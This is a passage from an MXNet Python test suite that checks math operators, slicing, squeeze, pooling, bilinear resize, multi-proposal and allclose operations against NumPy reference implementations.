-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
